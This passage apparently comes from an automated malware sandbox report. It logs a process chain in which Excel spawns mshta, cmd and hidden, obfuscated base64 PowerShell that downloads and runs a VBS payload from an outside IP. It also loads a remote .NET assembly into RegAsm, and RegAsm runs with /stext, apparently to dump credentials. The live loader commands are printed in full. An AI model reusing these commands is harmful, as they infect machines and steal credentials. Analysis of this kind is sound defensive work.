QsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv"
